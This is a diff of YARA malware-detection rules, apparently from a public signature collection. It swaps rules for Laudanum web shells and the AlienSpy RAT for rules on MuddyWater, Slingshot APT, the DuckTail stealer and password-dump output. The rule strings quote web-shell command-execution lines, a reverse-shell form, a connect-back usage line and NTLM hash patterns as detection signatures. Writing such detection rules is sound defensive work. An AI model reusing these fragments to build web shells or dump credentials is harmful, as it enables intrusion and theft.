 		modified = "2023-12-05"
-		reference = "https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L28-L50"
+		reference = "Internal Research - TI2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L28-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5836a9c627e2e6833ea9e27526c76c00fc1fcf1fca8ea10777aa6f4bcc25053"
-		score = 40
+		logic_hash = "b198396d27b32f8aa57a25cd6e33deb2bcfb726731e2e07f8b9d50b5f6ff13a0"
+		score = 75
 		quality = 85
-		tags = "CVE-2012-0158, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8391d6992bc037a891d2e91fd474b91bd821fe6cb9cfc62d1ee9a013b18eca80"
-		hash2 = "1ff3573fe995f35e70597c75d163bdd9bed86e2238867b328ccca2a5906c4eef"
-		hash3 = "d44a76120a505a9655f0224c6660932120ef2b72fee4642bab62ede136499590"
-		hash4 = "5b8019d339907ab948a413d2be4bdb3e5fdabb320f5edc726dc60b4c70e74c84"
+		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
+		hash2 = "366d8b84a43a528e6aaf9ecfc38980b148f983967803914471ccf011b9bb0832"
 
 	strings:
-		$s1 = "Content-Transfer-Encoding: base64" ascii fullword
-		$s2 = "Content-Type: application/x-mso" ascii fullword
-		$x1 = "QWN0aXZlTWltZQA" ascii
-		$x2 = "0M8R4KGxGuE" ascii
+		$s1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" fullword wide
+		$s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
+		$s3 = "*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB#Microsoft Word 16.0 O" wide
+		$s4 = "scripting.filesystemobject$" fullword ascii
+		$s5 = "ID=\"{00000000-0000-0000-0000-000000000000}\"" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x4d494d45 and all of ( $s* ) and 1 of ( $x* )
+		uint16( 0 ) == 0xcfd0 and filesize < 6000KB and all of them
 }
-rule SIGNATURE_BASE_Docm_In_PDF : FILE
+rule SIGNATURE_BASE_MAL_Muddywater_Droppedtask_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects an embedded DOCM in PDF combined with OpenAction"
+		description = "Detects a dropped Windows task as used by MudyWater in June 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08dfdfda-8ea5-530d-b89b-560415855080"
-		date = "2017-05-15"
+		id = "d9ef379d-161f-59f1-873e-3af12b24b76b"
+		date = "2018-06-12"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L52-L66"
+		reference = "https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L48-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "045cde0e8f9e0881c2caece7d5660e165aa67b43bed2ba6d4929951497d76494"
+		logic_hash = "776ae1adab223ae258d1c1c0c501e177dafe196964a2ede31789a7caa8495b2d"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ecc2e1817f655ece2bde39b7d6633f4f586093047ec5697a1fab6adc7e1da54"
 
 	strings:
-		$a1 = /<<\/Names\[\([\w]{1,12}.docm\)/ ascii
-		$a2 = "OpenAction" ascii fullword
-		$a3 = "JavaScript" ascii fullword
+		$x1 = "%11%\\scrobj.dll,NI,c:" wide
+		$s1 = "AppAct = \"SOFTWARE\\Microsoft\\Connection Manager\"" fullword wide
+		$s2 = "[DefenderService]" fullword wide
+		$s3 = "UnRegisterOCXs=EventManager" fullword wide
+		$s4 = "ShortSvcName=\" \"" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x46445025 and all of them
+		uint16( 0 ) == 0xfeff and filesize < 1KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Crime_Win_Rat_Alienspy : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Spork_Downloader : FILE
 {
 	meta:
-		description = "Alien Spy Remote Access Trojan"
-		author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
-		id = "a79789cd-9b16-58f5-ab51-48bb900583d1"
-		date = "2015-04-04"
+		description = "Detects malware from Slingshot APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21e02f78-40d8-5b56-b747-3f2a7a692259"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_alienspy_rat.yar#L2-L50"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b6fec104a89badb057619f648119dcf6debd294ee2b80a1fde6ffa30a7a45f7"
+		logic_hash = "5dac11c595d838cb6b5f1e548307ea79d119c890c54e954453cf1a264e1d14ed"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
-		reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
-		filetype = "Java"
-		hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
-		hash_2 = "818afea3040a887f191ee9d0579ac6ed"
-		hash_3 = "973de705f2f01e82c00db92eaa27912c"
-		hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
-		hash_5 = "071e12454731161d47a12a8c4b3adfea"
-		hash_6 = "a7d50760d49faff3656903c1130fd20b"
-		hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
-		hash_8 = "3698a3630f80a632c0c7c12e929184fb"
-		hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa_1 = "META-INF/MANIFEST.MF"
-		$sa_2 = "Main.classPK"
-		$sa_3 = "plugins/Server.classPK"
-		$sa_4 = "IDPK"
-		$sb_1 = "config.iniPK"
-		$sb_2 = "password.iniPK"
-		$sb_3 = "plugins/Server.classPK"
-		$sb_4 = "LoadStub.classPK"
-		$sb_5 = "LoadStubDecrypted.classPK"
-		$sb_7 = "LoadPassword.classPK"
-		$sb_8 = "DecryptStub.classPK"
-		$sb_9 = "ClassLoaders.classPK"
-		$sc_1 = "config.xml"
-		$sc_2 = "options"
-		$sc_3 = "plugins"
-		$sc_5 = "util/OSHelper"
-		$sc_6 = "Start.class"
-		$sc_7 = "AlienSpy"
+		$s1 = "Usage: spork -c IP:PORT" fullword ascii wide
+		$s2 = "connect-back IP address and port number"
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize < 800KB and ( ( all of ( $sa_* ) ) or ( all of ( $sb_* ) ) or ( all of ( $sc_* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Asp_File : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Minisling : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file file.asp"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2a80d1f-f2bb-573b-b68c-71e4dfa6e1fa"
-		date = "2015-06-22"
+		id = "99f9d5a1-b29f-52f7-9aec-02df4a51a756"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L8-L26"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L26-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
-		logic_hash = "9ec19a994571f4d1b40b6d6af3fb6eb4c5004a6439b99863b50dae0262677263"
+		logic_hash = "7d370271fea6c607c051eb49681600b4f59878c2fd2d43d71194bddda78d7b09"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
-		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
-		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii
-		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii
-		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
-		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
+		$s1 = "{6D29520B-F138-442e-B29F-A4E7140F33DE}" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 30KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Php_Killnc : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Ring0_Loader : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file killnc.php"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "241611d3-3636-5a25-b3c3-d45d6cb81c78"
-		date = "2015-06-22"
+		id = "b5301a45-a4ec-5e56-a990-bc6300ee6365"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L28-L45"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
-		logic_hash = "431a9a66f5d0e42856ca5716c2994c018f77cc338300abd71d94ffe7e75da3bf"
+		logic_hash = "c231158e44de01585e9fb4bd9768b388016972e2026e049070cdc6cd35362609"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
-		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
-		$s3 = "<?php echo exec('killall nc');?>" fullword ascii
-		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii
-		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
+		$s1 = " -> Missing element in DataDir -- cannot install" ascii
+		$s2 = " -> Primary loader not present in the DataDir" ascii
+		$s3 = "\\\\.\\amxpci" fullword ascii
+		$s4 = " -> [Goad] ERROR in CreateFile:" fullword ascii
+		$s5 = "\\\\.\\Sandra" fullword ascii
+		$s6 = " -> [Sandra] RingZeroCode" fullword ascii
+		$s7 = " -> [Sandra] Value from IOCTL_RDMSR:" fullword ascii
 
 	condition:
-		filesize < 15KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Asp_Shell : FILE
+
+rule SIGNATURE_BASE_Slingshot_APT_Malware_1 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.asp"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3ae27254-325a-5358-b5aa-ab24b43ad5a6"
-		date = "2015-06-22"
+		id = "72f4a52b-c70b-511f-acf5-6d680a95c7d6"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L47-L66"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L60-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
-		logic_hash = "af9c5cf7125e1210761e720c5f30527ac6345b5029b087807309000a29b67f6e"
+		logic_hash = "43cf94058fe3833a4623ecb784eea50e199536d4903fb9457843b7b5e9a244e3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4b250304e28648574b441831bf579b844e8e1fda941fb7f86a7ea7c4291bbca6"
 
 	strings:
-		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii
-		$s2 = "%ComSpec% /c dir" fullword ascii
-		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii
-		$s4 = "Server.ScriptTimeout = 180" fullword ascii
-		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii
-		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
-		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii
+		$s1 = "SlingDll.dll" fullword ascii
+		$s2 = "BogusDll." ascii
+		$s3 = "smsvcrt -h 0x%p" fullword wide
 
 	condition:
-		filesize < 15KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "7ead4bb0d752003ce7c062adb7ffc51a" or pe.exports ( "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0000" ) or 1 of them )
 }
-rule SIGNATURE_BASE_Settings : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Malware_2 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file settings.php"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "054b8723-fdfa-51dc-91ae-b915e40b2e54"
-		date = "2015-06-22"
+		id = "b85d3d81-0148-5ea0-9eff-d9bb63e3e75b"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L68-L83"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L81-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
-		logic_hash = "b02e293e659fa77257d0642c57e51d6ae712d9221ae295cf69bb845f68c650ee"
+		logic_hash = "d56dadf747c64cb518ddc9aaee38fd50c67fe7344d7569d9ef3169099e7f36c5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a51ef6d115daa648ddd57d1e4480f5a18daf40986bfde32aab19349aa010e67"
 
 	strings:
-		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii
-		$s2 = "<li>Reverse Shell - " fullword ascii
-		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii
+		$x1 = "\\\\?\\c:\\RECYCLER\\S-1-5-21-2225084468-623340172-1005306204-500\\INFO5" fullword wide
+		$x_slingshot = {09 46 BE 57 42 DD 70 35 5E }
+		$s1 = "Opening service %s for stop access failed.#" fullword wide
+		$s2 = "LanMan setting <%s> is ignored because system has a higher value already." fullword wide
+		$s3 = "\\DosDevices\\amxpci" wide
+		$s4 = "lNTLMqSpPD" fullword ascii
 
 	condition:
-		filesize < 13KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Asp_Proxy : FILE
+
+rule SIGNATURE_BASE_Slingshot_APT_Malware_3 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file proxy.asp"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6193b48a-b3da-5c1e-84e8-0035d9e7ade6"
-		date = "2015-06-22"
+		id = "4ef1f9a6-3d80-545e-8ac3-c6d46c71fca1"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L85-L103"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L102-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
-		logic_hash = "f53c97a2bf31f411b3220dc741b85d0edf96e9b92474f1abd5ac443be6b92897"
+		logic_hash = "420c54ce90a13258e0dd54524fe7df4dd97d3e8f1eeaa8ca14350670a87e87c6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fa513c65cded25a7992e2b0ab03c5dd5c6d0fc2282cd64a1e11a387a3341ce18"
 
 	strings:
-		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii
-		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii
-		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
-		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii
-		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii
-		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii
+		$a1 = "chmhlpr.dll" fullword ascii
+		$s2 = "%hc%hc%hc%hc" fullword ascii
+		$s3 = "%hc%hc%hc=" fullword ascii
+		$s4 = "%hc%hc==" fullword ascii
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2f3b3df466e24e0792e0e90d668856bc" or pe.exports ( "dll_u" ) or ( $a1 and 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_Cfm_Shell : FILE
+rule SIGNATURE_BASE_Slingshot_APT_Malware_4 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.cfm"
+		description = "Detects malware from Slingshot APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5308eecf-a59f-5100-ab60-5034c5b73e7e"
-		date = "2015-06-22"
+		id = "0f957330-1834-550f-ba5d-fb2bf0dfba7f"
+		date = "2018-03-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L105-L120"
+		reference = "https://securelist.com/apt-slingshot/84312/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L124-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "885e1783b07c73e7d47d3283be303c9719419b92"
-		logic_hash = "961eb398422e3c528b886c150f11dcb8a6832f0ea48e20ddc381e1f2740bd0c6"
+		logic_hash = "a9f4b7b4079ebd5ffbee4c82032d28b0015968cb369fae2b0f19b054bf5a1c3c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "38c4f5320b03cbaf5c14997ea321507730a8c16906e5906cbf458139c91d5945"
 
 	strings:
-		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii
-		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii
-		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
+		$x1 = "Ss -a 4104 -s 257092 -o 8 -l 406016 -r 4096 -z 315440" fullword wide
+		$s1 = "Slingshot" fullword ascii
+		$s2 = "\\\\?\\e:\\$Recycle.Bin\\" wide
+		$s3 = "LineRecs.reloc" fullword ascii
+		$s4 = "EXITGNG" fullword ascii
 
 	condition:
-		filesize < 20KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Aspx_Shell : FILE
+rule SIGNATURE_BASE_MAL_Compromised_Cert_Ducktail_Stealer_Jun23 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d4287007-79af-59fa-b8c8-3ac08d75b3bd"
-		date = "2015-06-22"
-		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L122-L138"
+		description = "Detects binaries signed with compromised certificates used by DuckTail stealer - identified in June 2023"
+		author = "dr4k0nia"
+		id = "b491e1b6-42c4-58e9-8efa-19e697804f96"
+		date = "2023-06-16"
+		modified = "2023-08-12"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ducktail_compromised_certs_jun23.yar#L2-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
-		logic_hash = "b31c36f53d46e17b6d97e582e46c540928a386e2075b841f5c11b959a0c68462"
-		score = 75
+		logic_hash = "9b7916700359d662e99003727f5293f5a937254ff265c3bc8bb8763e196daa0e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "17c75f2d14af9f00822fc1dba00ccc9ec71fc50962e196d7e6f193f4b2ee0183"
+		hash2 = "b3cfdb442772d07a7f037b0bb093ba315dfd1e79b0e292736c52097355495270"
+		hash3 = "9afe013cae0167993a6a7ccd650eb1221a5ec163110565eb3a49a8b57949d4ee"
 
 	strings:
-		$s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii
-		$s2 = "remoteIp = Request.UserHostAddress;" fullword ascii
-		$s3 = "<form method=\"post\" name=\"shell\">" fullword ascii
-		$s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii
+		$sx1 = "AZM MARKETING COMPANY LIMITED" ascii fullword
+		$sx2 = "CONG TY TNHH" ascii
+		$sx3 = {43 C3 94 4E 47 20 54 59 20 54 4E 48 48 20}
+		$sx4 = "CONG TY TRACH" ascii
+		$se1 = {65 78 BE 85 2D 48 E3 3D 4E 48 B8 D4 73 F5 B7 60}
+		$se2 = {1D 53 38 32 74 2B 58 37 87 C0 A2 53 32 F7 FB 06}
+		$se3 = {00 BD 7B 85 B2 6A 69 C9 7D 6D 68 CC 95 67 34 C0 6B}
+		$se4 = {06 5F 5C 57 0B D6 A7 98 92 FB B0 E6 34 61 3A 4D}
+		$se5 = {41 55 3F 07 13 37 11 7A 99 B4 58 57}
+		$se6 = {1E AA E4 CE E7 EE 89 FB 20 32 59 27 88 13 D8 53}
+		$se7 = {56 DC DB 85 D4 89 F9 87 B2 D6 76 72}
+		$se8 = {2D A4 50 57 C2 74 3C 1A 3C A4 93 7A}
+		$se9 = {37 AE 95 F5 4C 8E 9B D0 B6 47 68 6A}
+		$se10 = {3D C8 F5 3B 62 7A 34 07 AC 7E 01 00 13 87 A3 B3}
+		$se11 = {01 C9 87 5A 5F A8 59 68 6D 34 17 C9}
+		$se12 = {1B 35 19 E1 CD C2 6B 57 DA EE 06 C9}
+		$se13 = {79 7D 0B 5E 22 AA 0F C7 A2 97 E6 48}
+		$se14 = {57 9E 5C 89 B0 85 A7 96 B3 3C F3 19}
 
 	condition:
-		filesize < 20KB and all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $sx* ) and 1 of ( $se* )
 }
-rule SIGNATURE_BASE_Php_Shell : FILE
+rule SIGNATURE_BASE_NTLM_Dump_Output
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.php"
+		description = "NTML Hash Dump output file - John/LC format"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d3dcb16-090b-5a9f-b3d2-3822ec467f69"
-		date = "2015-06-22"
+		id = "d17ee473-317b-57d4-8ea8-7c89e8f2b2ed"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L140-L156"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L17-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
-		logic_hash = "dc798508434686bbcb4fa0bb47381252bfa0491b0987956fd4c5aa13b7f57810"
+		logic_hash = "154de926d27d38b38a4ed2c14b9122213fd1deb4115ef3bb77366db0818c7572"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii
-		$s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii
-		$s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii
-		$s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii
+		$s0 = "500:AAD3B435B51404EEAAD3B435B51404EE:" ascii
+		$s1 = "500:aad3b435b51404eeaad3b435b51404ee:" ascii
 
 	condition:
-		filesize < 40KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Php_Reverse_Shell : FILE
+rule SIGNATURE_BASE_Gsecdump_Password_Dump_File : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		description = "Detects a gsecdump output file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "306d150f-95a8-57fd-8f5e-786c429af6b3"
-		date = "2015-06-22"
+		id = "c7c8ab61-f728-5eb2-a5e3-b3dd84980870"
+		date = "2018-03-06"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L158-L173"
+		reference = "https://t.co/OLIj1yVJ4m"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L32-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
-		logic_hash = "ea8e320abb57e0467db92271f7d36f144f85e04ce15cd9fa8d3f53dfa8d43929"
-		score = 75
+		logic_hash = "483ad5217cbc065bd2f791c473b9a2455fddc4e0123268a8d37c64d92dd78c43"
+		score = 65
 		quality = 85
 		tags = "FILE"
